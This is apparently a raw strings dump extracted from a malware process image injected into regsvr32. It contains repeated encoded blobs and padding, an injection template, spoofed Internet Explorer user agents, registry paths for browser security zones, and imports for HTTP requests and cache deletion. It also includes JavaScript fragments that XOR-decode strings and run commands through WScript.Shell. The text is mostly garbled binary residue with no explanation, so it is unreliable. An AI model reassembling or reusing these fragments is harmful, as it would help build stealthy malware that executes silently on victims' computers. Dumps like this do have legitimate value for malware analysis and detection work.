/sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
UhwEB
Uhû
Uh'%C
Uh,
Uh1%D
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
c:\%original file name%.exe path<<c:\%original file name%.exe>>path inj_ffile<<:2:>>inj_ffile

regsvr32.exe_436_rwx_00080000_000C2000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
2 2*393
7:8?8[8`8
8$8(8,8084888
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 